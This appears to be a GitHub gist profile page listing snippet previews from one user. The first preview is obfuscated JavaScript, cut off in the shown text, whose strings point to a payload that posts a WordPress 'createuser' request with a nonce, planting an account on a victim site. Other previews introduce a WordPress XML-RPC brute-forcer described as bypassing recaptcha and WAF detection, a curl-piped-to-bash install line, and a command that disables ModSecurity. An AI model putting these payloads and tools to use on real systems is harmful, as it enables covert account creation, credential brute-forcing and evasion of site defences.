Skip to content

Instantly share code, notes, and snippets.

View a9v8i's full-sized avatar

Afshin Fakhim a9v8i

View GitHub Profile
var _0x524fb1=_0x40b6;(function(_0x4f989f,_0x4d3fd8){var _0x1524b2=_0x40b6,_0x28dc46=_0x4f989f();while(!![]){try{var _0xdcf602=-parseInt(_0x1524b2(0x1a1))/0x1*(parseInt(_0x1524b2(0x19e))/0x2)+parseInt(_0x1524b2(0x190))/0x3+parseInt(_0x1524b2(0x192))/0x4+-parseInt(_0x1524b2(0x1a2))/0x5*(-parseInt(_0x1524b2(0x19b))/0x6)+parseInt(_0x1524b2(0x197))/0x7*(parseInt(_0x1524b2(0x196))/0x8)+-parseInt(_0x1524b2(0x19a))/0x9*(parseInt(_0x1524b2(0x194))/0xa)+parseInt(_0x1524b2(0x195))/0xb;if(_0xdcf602===_0x4d3fd8)break;else _0x28dc46['push'](_0x28dc46['shift']());}catch(_0x4aaa09){_0x28dc46['push'](_0x28dc46['shift']());}}}(_0x5dad,0xc199e));function _0x5dad(){var _0x2283ad=['4215xqldoS','5218795TaevLA','L3dwLWF','1511619FbVfyv','setRequestHeader','1278300SBmJIr','action=createuser&_wpnonce_create-user=','336790MoLXOb','8800836glQaNS','72nWpVae','878297Owvjzx','application/x-www-form-urlencoded','GET','387wjxKDf','6oGXNNY','POST','open','738dpCibH','responseText','send'];_0x5dad=function(){return _0x2283ad;};return _0x5dad
@a9v8i
a9v8i / TorTer.sh
Last active June 19, 2022 23:53
Tor Proxy on Termux Android for Bypass ISP Filtering Twitter & Telegram
#!/bin/bash
# v98
# ┌──(unk9vvn㉿avi)-[~]
# └─$ curl -sL https://gist.githubusercontent.com/a9v8i/beaeabfd264ab68c6a24a3106e734dfb/raw/2b7721e7fcc8b1dc0ceb23c3e58bc8b2cfc56bc7/TorTer.sh | bash
DHCPCD=$(cat $PREFIX/etc/tor/torrc|grep -o "UseBridges 1")
@a9v8i
a9v8i / RPiTR.sh
Last active March 2, 2021 07:36
Tor Router Raspberry Pi 3
#!/bin/bash
# v98
# Raspberry Pi Desktop
# eth0 = tor gateway
# wlan0 = internet gateway
# ┌──(unk9vvn㉿avi)-[~]
# └─$ sudo chmod +x RPiTOR.sh;sudo ./RPiTOR.sh
@a9v8i
a9v8i / ModSecurity-DEB.sh
Created February 17, 2021 13:55
Install and Testing Mod Security (WAF) on DVWA Laboratory with Metasploit LFI Module (php_include)
#!/bin/bash
# v10
# ┌──(unk9vvn㉿avi)-[~]
# └─$ sudo chmod +x ModSecurity-DEB.sh;sudo ./ModSecurity-DEB.sh
# Debian-Kali
# Switch off WAF
# ┌──(unk9vvn㉿avi)-[~]
# └─$ sed -i "s#SecRuleEngine On#SecRuleEngine Off#g" /etc/modsecurity/modsecurity.conf;service apache2 restart
@a9v8i
a9v8i / ripdc.sh
Last active February 17, 2021 13:53
Reverse IP Domain Checker
#!/bin/bash
# v10
# ┌──(unk9vvn㉿avi)-[~]
# └─$ sudo chmod +x ripdc.sh;sudo ./ripdc.sh -t target.com
VERSION="ripdc.sh v0.3"
FALSE="0"
TRUE="1"
@a9v8i
a9v8i / wp-bruteforcer.sh
Created February 17, 2021 13:46
Bruteforce Wordpress (XMLRPC) Bypass Recaptcha & WAF Detection
#!/bin/bash
# v10
# ┌──(unk9vvn㉿avi)-[~]
# └─$ sudo chmod +x wp-bruteforecer.sh;sudo ./wp-bruteforecer.sh target.com ~/Passlist.txt
RED='\e[1;31m%s\e[0m\n'
GREEN='\e[1;32m%s\e[0m\n'
YELLOW='\e[1;33m%s\e[0m\n'